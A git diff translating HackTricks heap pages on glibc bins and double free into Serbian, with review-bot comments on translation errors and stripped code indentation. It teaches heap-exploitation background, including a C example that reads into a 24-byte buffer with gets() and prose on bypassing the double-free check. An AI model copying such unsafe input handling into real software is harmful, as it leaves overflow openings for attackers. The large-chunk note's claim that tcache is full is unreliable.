Chunks in fastbins keep their inuse bit set, so they cannot - be consolidated with other free chunks. malloc_consolidate - releases all chunks in fastbins and consolidates them with - other free chunks. - */ +Chunks in fastbins keep their inuse bit set, so they cannot +be consolidated with other free chunks. malloc_consolidate +releases all chunks in fastbins and consolidates them with +other free chunks. +*/ typedef struct malloc_chunk *mfastbinptr; #define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx]) /* offset 2 to use otherwise unindexable first 2 bins */ #define fastbin_index(sz) \ - ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2) +((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2) /* The maximum fastbin request size we support */ 
@@ -208,43 +199,39 @@ typedef struct malloc_chunk *mfastbinptr; #define NFASTBINS (fastbin_index (request2size (MAX_FAST_SIZE)) + 1) ``` -
-Add a fastbin chunk example - +Dodajte primer fastbin chunk-a ```c #include #include int main(void) { - char *chunks[8]; - int i; +char *chunks[8]; +int i; - // Loop to allocate memory 8 times - for (i = 0; i < 8; i++) { - chunks[i] = malloc(24); - if (chunks[i] == NULL) { // Check if malloc failed - fprintf(stderr, "Memory allocation failed at iteration %d\n", i); - return 1; - } - printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); - } +// Loop to allocate memory 8 times +for (i = 0; i < 8; i++) { +chunks[i] = malloc(24); +if (chunks[i] == NULL) { // Check if malloc failed +fprintf(stderr, "Memory allocation failed at iteration %d\n", i); +return 1; +} +printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); +} - // Loop to free the allocated memory - for (i = 0; i < 8; i++) { - free(chunks[i]); - } +// Loop to free the allocated memory +for (i = 0; i < 8; i++) { +free(chunks[i]); +} - return 0; +return 0; } ``` +Napomena kako alociramo i oslobađamo 8 delova iste veličine tako da popune tcache, a osmi se čuva u fast chunk. -Note how we allocate and free 8 chunks of the same size so they fill the tcache and the eight one is stored in the fast chunk. - -Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. then with `gef` you can see that the tcache bin is full and one chunk is in the fast bin: - +Kompajlirajte to i debagujte sa breakpoint-om u `ret` opcode-u iz `main` funkcije. Tada sa `gef` možete videti da je tcache bin pun i da je jedan chunk u fast bin: ```bash gef➤ heap bins ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── @@ -253,58 +240,54 @@ Tcachebins[idx=0, size=0x20, count=7] ← Chunk(addr=0xaaaaaaac1770, size=0x20, Fastbins[idx=0, size=0x20] ← Chunk(addr=0xaaaaaaac1790, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) Fastbins[idx=1, size=0x30] 0x00 ``` -
-### Unsorted bin +### Neuređeni kontejner -The unsorted bin is a **cache** used by the heap manager to make memory allocation quicker. Here's how it works: When a program frees a chunk, and if this chunk cannot be allocated in a tcache or fast bin and is not colliding with the top chunk, the heap manager doesn't immediately put it in a specific small or large bin. Instead, it first tries to **merge it with any neighbouring free chunks** to create a larger block of free memory. Then, it places this new chunk in a general bin called the "unsorted bin." +Neuređeni kontejner je **keš** koji koristi upravitelj heap-a kako bi ubrzao alokaciju memorije. Evo kako to funkcioniše: Kada program oslobodi deo memorije, i ako se taj deo ne može alocirati u tcache ili fast bin i ne sudara se sa vrhunskim delom, upravitelj heap-a ga odmah ne stavlja u određeni mali ili veliki kontejner. Umesto toga, prvo pokušava da **spoji ga sa bilo kojim susednim slobodnim delovima** kako bi stvorio veći blok slobodne memorije. Zatim, stavlja ovaj novi deo u opšti kontejner nazvan "neuređeni kontejner." -When a program **asks for memory**, the heap manager **checks the unsorted bin** to see if there's a chunk of enough size. If it finds one, it uses it right away. If it doesn't find a suitable chunk in the unsorted bin, it moves all the chunks in this list to their corresponding bins, either small or large, based on their size. +Kada program **traži memoriju**, upravitelj heap-a **proverava neuređeni kontejner** da vidi da li postoji deo dovoljne veličine. Ako ga pronađe, odmah ga koristi. Ako ne pronađe odgovarajući deo u neuređenom kontejneru, premestiće sve delove u ovoj listi u njihove odgovarajuće kontejnere, bilo male ili velike, na osnovu njihove veličine. -Note that if a larger chunk is split in 2 halves and the rest is larger than MINSIZE, it'll be paced back into the unsorted bin. 
+Napomena: ako se veći deo podeli na 2 polovine i ostatak je veći od MINSIZE, biće vraćen nazad u neuređeni kontejner. -So, the unsorted bin is a way to speed up memory allocation by quickly reusing recently freed memory and reducing the need for time-consuming searches and merges. +Dakle, neuređeni kontejner je način da se ubrza alokacija memorije brzo ponovnim korišćenjem nedavno oslobođene memorije i smanji potreba za vremenski zahtevnim pretragama i spajanjima. > [!CAUTION] -> Note that even if chunks are of different categories, if an available chunk is colliding with another available chunk (even if they belong originally to different bins), they will be merged. +> Napomena: čak i ako su delovi različitih kategorija, ako se dostupan deo sudara sa drugim dostupnim delom (čak i ako prvobitno pripadaju različitim kontejnerima), biće spojeni.
-Add a unsorted chunk example - +Dodaj primer neuređenog dela ```c #include #include int main(void) { - char *chunks[9]; - int i; +char *chunks[9]; +int i; - // Loop to allocate memory 8 times - for (i = 0; i < 9; i++) { - chunks[i] = malloc(0x100); - if (chunks[i] == NULL) { // Check if malloc failed - fprintf(stderr, "Memory allocation failed at iteration %d\n", i); - return 1; - } - printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); - } +// Loop to allocate memory 8 times +for (i = 0; i < 9; i++) { +chunks[i] = malloc(0x100); +if (chunks[i] == NULL) { // Check if malloc failed +fprintf(stderr, "Memory allocation failed at iteration %d\n", i); +return 1; +} +printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); +} - // Loop to free the allocated memory - for (i = 0; i < 8; i++) { - free(chunks[i]); - } +// Loop to free the allocated memory +for (i = 0; i < 8; i++) { +free(chunks[i]); +} - return 0; +return 0; } ``` +Napomena kako alociramo i oslobađamo 9 delova iste veličine tako da **popune tcache** i osmi se čuva u nesortiranom binu jer je **prevelik za fastbin**, a deveti nije oslobođen, tako da se deveti i osmi **ne spajaju sa vrhunskim delom**. -Note how we allocate and free 9 chunks of the same size so they **fill the tcache** and the eight one is stored in the unsorted bin because it's **too big for the fastbin** and the nineth one isn't freed so the nineth and the eighth **don't get merged with the top chunk**. - -Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. Then with `gef` you can see that the tcache bin is full and one chunk is in the unsorted bin: - +Kompajlirajte to i debagujte sa tačkom prekida u `ret` opkodu iz `main` funkcije. 
Tada sa `gef` možete videti da je tcache bin pun i jedan deo je u nesortiranom binu: ```bash gef➤ heap bins ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── @@ -319,23 +302,21 @@ Fastbins[idx=5, size=0x70] 0x00 Fastbins[idx=6, size=0x80] 0x00 ─────────────────────────────────────────────────────────────────────── Unsorted Bin for arena at 0xfffff7f90b00 ─────────────────────────────────────────────────────────────────────── [+] unsorted_bins[0]: fw=0xaaaaaaac1e10, bk=0xaaaaaaac1e10 - → Chunk(addr=0xaaaaaaac1e20, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) +→ Chunk(addr=0xaaaaaaac1e20, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) [+] Found 1 chunks in unsorted bin. ``` -
-### Small Bins +### Male Bine -Small bins are faster than large bins but slower than fast bins. +Male bine su brže od velikih bina, ali sporije od brzih bina. -Each bin of the 62 will have **chunks of the same size**: 16, 24, ... (with a max size of 504 bytes in 32bits and 1024 in 64bits). This helps in the speed on finding the bin where a space should be allocated and inserting and removing of entries on these lists. +Svaki bin od 62 će imati **delove iste veličine**: 16, 24, ... (sa maksimalnom veličinom od 504 bajta u 32bita i 1024 u 64bita). Ovo pomaže u brzini pronalaženja bina gde bi prostor trebao biti dodeljen i umetanja i uklanjanja unosa na ovim listama. -This is how the size of the small bin is calculated according to the index of the bin: - -- Smallest size: 2\*4\*index (e.g. index 5 -> 40) -- Biggest size: 2\*8\*index (e.g. index 5 -> 80) +Ovako se veličina malog bina izračunava prema indeksu bina: +- Najmanja veličina: 2\*4\*indeks (npr. indeks 5 -> 40) +- Najveća veličina: 2\*8\*indeks (npr. indeks 5 -> 80) ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1711 #define NSMALLBINS 64 
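Review bot: "top chunk" is mistranslated as "vrhunski deo" in the Unsorted bin paragraph ("ne sudara se sa vrhunskim delom") and again in the note under the unsorted-chunk example ("ne spajaju sa vrhunskim delom"); "vrhunski" means "top-quality", not "topmost", and the same file's Top Chunk heading later uses "Gornji deo", so "gornji deo" is the term to use here. Bin terminology also drifts between these two hunks: "neuređeni kontejner" in the Unsorted bin section, "nesortiranom binu" in the example note, "Male Bine"/"malom binu" in the Small Bins section, and "fast bins" becomes "brzih bina" in "sporije od brzih bina" while it stays "fastbin"/"fast bin" everywhere else; pick one rendering of "bin" and keep "fast bin"/"tcache" untranslated as the rest of the page does. "Napomena kako alociramo" is also ungrammatical for "Note how we allocate" ("Obratite pažnju kako alociramo"). Finally, every line inside the fenced C block and the `gef➤ heap bins` output loses its leading indentation (`-    char *chunks[9];` becomes `+char *chunks[9];`, `- → Chunk(...)` becomes `+→ Chunk(...)`), and the blank lines around the fences are dropped: a translation commit should not touch code or captured debugger output, so restore the original whitespace.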
@@ -344,58 +325,52 @@ This is how the size of the small bin is calculated according to the index of th #define MIN_LARGE_SIZE ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH) #define in_smallbin_range(sz) \ - ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE) +((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE) #define smallbin_index(sz) \ - ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\ - + SMALLBIN_CORRECTION) +((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\ ++ SMALLBIN_CORRECTION) ``` - -Function to choose between small and large bins: - +Функција за избор између малих и великих контејнера: ```c #define bin_index(sz) \ - ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz)) +((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz)) ``` -
-Add a small chunk example - +Dodajte mali primer ```c #include #include int main(void) { - char *chunks[10]; - int i; +char *chunks[10]; +int i; - // Loop to allocate memory 8 times - for (i = 0; i < 9; i++) { - chunks[i] = malloc(0x100); - if (chunks[i] == NULL) { // Check if malloc failed - fprintf(stderr, "Memory allocation failed at iteration %d\n", i); - return 1; - } - printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); - } +// Loop to allocate memory 8 times +for (i = 0; i < 9; i++) { +chunks[i] = malloc(0x100); +if (chunks[i] == NULL) { // Check if malloc failed +fprintf(stderr, "Memory allocation failed at iteration %d\n", i); +return 1; +} +printf("Address of chunk %d: %p\n", i, (void *)chunks[i]); +} - // Loop to free the allocated memory - for (i = 0; i < 8; i++) { - free(chunks[i]); - } +// Loop to free the allocated memory +for (i = 0; i < 8; i++) { +free(chunks[i]); +} - chunks[9] = malloc(0x110); +chunks[9] = malloc(0x110); - return 0; +return 0; } ``` +Napomena kako alociramo i oslobađamo 9 delova iste veličine tako da **popunimo tcache** i osmi se čuva u nesortiranom binu jer je **prevelik za fastbin**, a deveti nije oslobođen, tako da se deveti i osmi **ne spajaju sa vrhunskim delom**. Zatim alociramo veći deo od 0x110 što čini da **deo u nesortiranom binu ide u mali bin**. -Note how we allocate and free 9 chunks of the same size so they **fill the tcache** and the eight one is stored in the unsorted bin because it's **too big for the fastbin** and the ninth one isn't freed so the ninth and the eights **don't get merged with the top chunk**. Then we allocate a bigger chunk of 0x110 which makes **the chunk in the unsorted bin goes to the small bin**. - -Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. then with `gef` you can see that the tcache bin is full and one chunk is in the small bin: - +Kompajlirajte to i debagujte sa tačkom prekida u `ret` opkodu iz `main` funkcije. 
Tada sa `gef` možete videti da je tcache bin pun i da je jedan deo u malom binu: ```bash gef➤ heap bins ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── @@ -412,96 +387,90 @@ Fastbins[idx=6, size=0x80] 0x00 [+] Found 0 chunks in unsorted bin. ──────────────────────────────────────────────────────────────────────── Small Bins for arena at 0xfffff7f90b00 ──────────────────────────────────────────────────────────────────────── [+] small_bins[16]: fw=0xaaaaaaac1e10, bk=0xaaaaaaac1e10 - → Chunk(addr=0xaaaaaaac1e20, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) +→ Chunk(addr=0xaaaaaaac1e20, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) [+] Found 1 chunks in 1 small non-empty bins. ``` -
-### Large bins +### Veliki kontejneri -Unlike small bins, which manage chunks of fixed sizes, each **large bin handle a range of chunk sizes**. This is more flexible, allowing the system to accommodate **various sizes** without needing a separate bin for each size. +Za razliku od malih kontejnera, koji upravljaju delovima fiksnih veličina, svaki **veliki kontejner upravlja opsegom veličina delova**. Ovo je fleksibilnije, omogućavajući sistemu da prilagodi **različite veličine** bez potrebe za posebnim kontejnerom za svaku veličinu. -In a memory allocator, large bins start where small bins end. The ranges for large bins grow progressively larger, meaning the first bin might cover chunks from 512 to 576 bytes, while the next covers 576 to 640 bytes. This pattern continues, with the largest bin containing all chunks above 1MB. +U alokatoru memorije, veliki kontejneri počinju gde mali kontejneri završavaju. Opsezi za velike kontejneri postaju progresivno veći, što znači da prvi kontejner može pokriti delove od 512 do 576 bajtova, dok sledeći pokriva od 576 do 640 bajtova. Ovaj obrazac se nastavlja, pri čemu najveći kontejner sadrži sve delove iznad 1MB. -Large bins are slower to operate compared to small bins because they must **sort and search through a list of varying chunk sizes to find the best fit** for an allocation. When a chunk is inserted into a large bin, it has to be sorted, and when memory is allocated, the system must find the right chunk. This extra work makes them **slower**, but since large allocations are less common than small ones, it's an acceptable trade-off. +Veliki kontejneri su sporiji za rad u poređenju sa malim kontejnerima jer moraju **sortirati i pretraživati listu delova različitih veličina kako bi pronašli najbolju opciju** za alokaciju. Kada se deo umetne u veliki kontejner, mora se sortirati, a kada se memorija alocira, sistem mora pronaći pravi deo. 
Ovaj dodatni rad ih čini **sporijim**, ali pošto su velike alokacije ređe od malih, to je prihvatljiva kompenzacija. -There are: +Postoji: -- 32 bins of 64B range (collide with small bins) -- 16 bins of 512B range (collide with small bins) -- 8bins of 4096B range (part collide with small bins) -- 4bins of 32768B range -- 2bins of 262144B range -- 1bin for remaining sizes +- 32 kontejnera opsega 64B (sukob sa malim kontejnerima) +- 16 kontejnera opsega 512B (sukob sa malim kontejnerima) +- 8 kontejnera opsega 4096B (delimično sukob sa malim kontejnerima) +- 4 kontejnera opsega 32768B +- 2 kontejnera opsega 262144B +- 1 kontejner za preostale veličine
-Large bin sizes code - +Kod veličina velikih kontejnera ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1711 #define largebin_index_32(sz) \ - (((((unsigned long) (sz)) >> 6) <= 38) ? 56 + (((unsigned long) (sz)) >> 6) :\ - ((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ - ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ - ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ - ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ - 126) +(((((unsigned long) (sz)) >> 6) <= 38) ? 56 + (((unsigned long) (sz)) >> 6) :\ +((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ +((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ +((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ +((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ +126) #define largebin_index_32_big(sz) \ - (((((unsigned long) (sz)) >> 6) <= 45) ? 49 + (((unsigned long) (sz)) >> 6) :\ - ((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ - ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ - ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ - ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ - 126) +(((((unsigned long) (sz)) >> 6) <= 45) ? 49 + (((unsigned long) (sz)) >> 6) :\ +((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ +((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ +((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ +((((unsigned long) (sz)) >> 18) <= 2) ? 
124 + (((unsigned long) (sz)) >> 18) :\ +126) // XXX It remains to be seen whether it is good to keep the widths of // XXX the buckets the same or whether it should be scaled by a factor // XXX of two as well. #define largebin_index_64(sz) \ - (((((unsigned long) (sz)) >> 6) <= 48) ? 48 + (((unsigned long) (sz)) >> 6) :\ - ((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ - ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ - ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ - ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ - 126) +(((((unsigned long) (sz)) >> 6) <= 48) ? 48 + (((unsigned long) (sz)) >> 6) :\ +((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ +((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ +((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ +((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ +126) #define largebin_index(sz) \ - (SIZE_SZ == 8 ? largebin_index_64 (sz) \ - : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz) \ - : largebin_index_32 (sz)) +(SIZE_SZ == 8 ? largebin_index_64 (sz) \ +: MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz) \ +: largebin_index_32 (sz)) ``` -
-Add a large chunk example - +Dodajte veliki primer ```c #include #include int main(void) { - char *chunks[2]; +char *chunks[2]; - chunks[0] = malloc(0x1500); - chunks[1] = malloc(0x1500); - free(chunks[0]); - chunks[0] = malloc(0x2000); +chunks[0] = malloc(0x1500); +chunks[1] = malloc(0x1500); +free(chunks[0]); +chunks[0] = malloc(0x2000); - return 0; +return 0; } ``` +2 velike alokacije se vrše, zatim se jedna oslobađa (stavljajući je u neusortiranu kantu) i vrši se veća alokacija (premještajući oslobođenu iz neusortirane kante u veliku kantu). -2 large allocations are performed, then on is freed (putting it in the unsorted bin) and a bigger allocation in made (moving the free one from the usorted bin ro the large bin). - -Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. then with `gef` you can see that the tcache bin is full and one chunk is in the large bin: - +Kompajlirajte to i debagujte sa tačkom prekida u `ret` opkodu iz `main` funkcije. Tada sa `gef` možete videti da je tcache kanta puna i da je jedan deo u velikoj kanti: ```bash gef➤ heap bin ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── @@ -520,117 +489,108 @@ Fastbins[idx=6, size=0x80] 0x00 [+] Found 0 chunks in 0 small non-empty bins. ──────────────────────────────────────────────────────────────────────── Large Bins for arena at 0xfffff7f90b00 ──────────────────────────────────────────────────────────────────────── [+] large_bins[100]: fw=0xaaaaaaac1290, bk=0xaaaaaaac1290 - → Chunk(addr=0xaaaaaaac12a0, size=0x1510, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) +→ Chunk(addr=0xaaaaaaac12a0, size=0x1510, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) [+] Found 1 chunks in 1 large non-empty bins. ``` -
-### Top Chunk - +### Gornji deo ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1711 /* - Top +Top - The top-most available chunk (i.e., the one bordering the end of - available memory) is treated specially. It is never included in - any bin, is used only if no other chunk is available, and is - released back to the system if it is very large (see - M_TRIM_THRESHOLD). Because top initially - points to its own bin with initial zero size, thus forcing - extension on the first malloc request, we avoid having any special - code in malloc to check whether it even exists yet. But we still - need to do so when getting memory from system, so we make - initial_top treat the bin as a legal but unusable chunk during the - interval between initialization and the first call to - sysmalloc. (This is somewhat delicate, since it relies on - the 2 preceding words to be zero during this interval as well.) - */ +The top-most available chunk (i.e., the one bordering the end of +available memory) is treated specially. It is never included in +any bin, is used only if no other chunk is available, and is +released back to the system if it is very large (see +M_TRIM_THRESHOLD). Because top initially +points to its own bin with initial zero size, thus forcing +extension on the first malloc request, we avoid having any special +code in malloc to check whether it even exists yet. But we still +need to do so when getting memory from system, so we make +initial_top treat the bin as a legal but unusable chunk during the +interval between initialization and the first call to +sysmalloc. (This is somewhat delicate, since it relies on +the 2 preceding words to be zero during this interval as well.) +*/ /* Conveniently, the unsorted bin can be used as dummy top on first call */ #define initial_top(M) (unsorted_chunks (M)) ``` +U suštini, ovo je deo koji sadrži sve trenutno dostupne heap-ove. 
Kada se izvrši malloc, ako ne postoji dostupna slobodna jedinica za korišćenje, ova gornja jedinica će smanjiti svoju veličinu kako bi dala neophodan prostor.\ +Pokazivač na Gornju Jedinicu se čuva u `malloc_state` strukturi. -Basically, this is a chunk containing all the currently available heap. When a malloc is performed, if there isn't any available free chunk to use, this top chunk will be reducing its size giving the necessary space.\ -The pointer to the Top Chunk is stored in the `malloc_state` struct. - -Moreover, at the beginning, it's possible to use the unsorted chunk as the top chunk. +Pored toga, na početku, moguće je koristiti nesortiranu jedinicu kao gornju jedinicu.
-Observe the Top Chunk example - +Posmatrajte primer Gornje Jedinice ```c #include #include int main(void) { - char *chunk; - chunk = malloc(24); - printf("Address of the chunk: %p\n", (void *)chunk); - gets(chunk); - return 0; +char *chunk; +chunk = malloc(24); +printf("Address of the chunk: %p\n", (void *)chunk); +gets(chunk); +return 0; } ``` - -After compiling and debugging it with a break point in the `ret` opcode of `main` I saw that the malloc returned the address `0xaaaaaaac12a0` and these are the chunks: - +Nakon kompajliranja i debagovanja sa tačkom prekida u `ret` opkodu `main`, video sam da je malloc vratio adresu `0xaaaaaaac12a0` i ovo su delovi: ```bash gef➤ heap chunks Chunk(addr=0xaaaaaaac1010, size=0x290, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) - [0x0000aaaaaaac1010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................] +[0x0000aaaaaaac1010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................] Chunk(addr=0xaaaaaaac12a0, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) - [0x0000aaaaaaac12a0 41 41 41 41 41 41 41 00 00 00 00 00 00 00 00 00 AAAAAAA.........] +[0x0000aaaaaaac12a0 41 41 41 41 41 41 41 00 00 00 00 00 00 00 00 00 AAAAAAA.........] Chunk(addr=0xaaaaaaac12c0, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) - [0x0000aaaaaaac12c0 41 64 64 72 65 73 73 20 6f 66 20 74 68 65 20 63 Address of the c] +[0x0000aaaaaaac12c0 41 64 64 72 65 73 73 20 6f 66 20 74 68 65 20 63 Address of the c] Chunk(addr=0xaaaaaaac16d0, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) - [0x0000aaaaaaac16d0 41 41 41 41 41 41 41 0a 00 00 00 00 00 00 00 00 AAAAAAA.........] +[0x0000aaaaaaac16d0 41 41 41 41 41 41 41 0a 00 00 00 00 00 00 00 00 AAAAAAA.........] Chunk(addr=0xaaaaaaac1ae0, size=0x20530, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← top chunk ``` - -Where it can be seen that the top chunk is at address `0xaaaaaaac1ae0`. 
This is no surprise because the last allocated chunk was in `0xaaaaaaac12a0` with a size of `0x410` and `0xaaaaaaac12a0 + 0x410 = 0xaaaaaaac1ae0` .\ -It's also possible to see the length of the Top chunk on its chunk header: - +Gde se može videti da je gornji deo na adresi `0xaaaaaaac1ae0`. To nije iznenađenje jer je poslednji alocirani deo bio na `0xaaaaaaac12a0` sa veličinom `0x410` i `0xaaaaaaac12a0 + 0x410 = 0xaaaaaaac1ae0`.\ +Takođe je moguće videti dužinu gornjeg dela na njegovom zaglavlju dela: ```bash gef➤ x/8wx 0xaaaaaaac1ae0 - 16 0xaaaaaaac1ad0: 0x00000000 0x00000000 0x00020531 0x00000000 0xaaaaaaac1ae0: 0x00000000 0x00000000 0x00000000 0x00000000 ``` -
-### Last Remainder +### Poslednji Ostatak -When malloc is used and a chunk is divided (from the unsorted bin or from the top chunk for example), the chunk created from the rest of the divided chunk is called Last Remainder and it's pointer is stored in the `malloc_state` struct. +Kada se koristi malloc i deo se deli (na primer, iz nesortiranog bin-a ili iz gornjeg dela), deo koji se stvara od ostatka podeljenog dela se naziva Poslednji Ostatak i njegov pokazivač se čuva u `malloc_state` strukturi. -## Allocation Flow +## Tok Alokacije -Check out: +Pogledajte: {{#ref}} heap-memory-functions/malloc-and-sysmalloc.md {{#endref}} -## Free Flow +## Tok Oslobađanja -Check out: +Pogledajte: {{#ref}} heap-memory-functions/free.md {{#endref}} -## Heap Functions Security Checks +## Provere Bezbednosti Funkcija na Heap-u -Check the security checks performed by heavily used functions in heap in: +Proverite provere bezbednosti koje obavljaju često korišćene funkcije na heap-u u: {{#ref}} heap-memory-functions/heap-functions-security-checks.md {{#endref}} -## References +## Reference - [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/) - [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/) diff --git a/src/binary-exploitation/libc-heap/double-free.md b/src/binary-exploitation/libc-heap/double-free.md index a30116d58..e0705f2bc 100644 --- a/src/binary-exploitation/libc-heap/double-free.md +++ b/src/binary-exploitation/libc-heap/double-free.md 
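Review bot: In the bins-and-memory-allocations.md hunks above (small-chunk example, Large bins, Top Chunk), two sentences change meaning in translation. "this is a chunk containing all the currently available heap" becomes "deo koji sadrži sve trenutno dostupne heap-ove" (all currently available heaps, plural); it should be "sav trenutno dostupan heap". The example labels "Add a small chunk example" and "Add a large chunk example" become "Dodajte mali primer" / "Dodajte veliki primer" (a small/large example), dropping "chunk" ("primer malog dela" / "primer velikog dela"). Terminology keeps shifting: the heading is "Gornji deo" but the paragraph and example label call it "Gornja Jedinica", the large-chunk note switches to "kanta" ("neusortiranu kantu", "veliku kantu") and to ijekavian "premještajući" in an otherwise ekavian file, "trade-off" is rendered "kompenzacija" (should be "kompromis"), and one line ("Функција за избор између малих и великих контејнера:") is in Cyrillic while the rest of the file is Latin script. The large-chunk note also carries over the English claim that "the tcache bin is full", but that example only does two `malloc(0x1500)` calls and one `free`, so nothing enters tcache; worth fixing in both languages while the line is being touched. As in the earlier hunks, the glibc macro definitions and the `heap chunks` / `x/8wx` output lose their leading indentation; in `smallbin_index` the continuation line now appears as `++ SMALLBIN_CORRECTION)` in the diff, i.e. the `+ SMALLBIN_CORRECTION)` line with its indentation stripped, which makes the macro harder to compare against the upstream source it is cited from.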
@@ -2,91 +2,89 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -If you free a block of memory more than once, it can mess up the allocator's data and open the door to attacks. Here's how it happens: when you free a block of memory, it goes back into a list of free chunks (e.g. the "fast bin"). If you free the same block twice in a row, the allocator detects this and throws an error. But if you **free another chunk in between, the double-free check is bypassed**, causing corruption. +Ako oslobodite blok memorije više od jednom, to može poremetiti podatke alokatora i otvoriti vrata napadima. Evo kako se to dešava: kada oslobodite blok memorije, on se vraća u listu slobodnih delova (npr. "brzi bin"). Ako oslobodite isti blok dva puta zaredom, alokator to detektuje i javlja grešku. Ali ako **oslobodite drugi deo između, provera duplog oslobađanja se zaobilazi**, što uzrokuje oštećenje. -Now, when you ask for new memory (using `malloc`), the allocator might give you a **block that's been freed twice**. This can lead to two different pointers pointing to the same memory location. If an attacker controls one of those pointers, they can change the contents of that memory, which can cause security issues or even allow them to execute code. - -Example: +Sada, kada zatražite novu memoriju (koristeći `malloc`), alokator vam može dati **blok koji je oslobođen dva puta**. To može dovesti do dva različita pokazivača koji upućuju na istu memorijsku lokaciju. Ako napadač kontroliše jedan od tih pokazivača, može promeniti sadržaj te memorije, što može izazvati sigurnosne probleme ili čak omogućiti izvršavanje koda. 
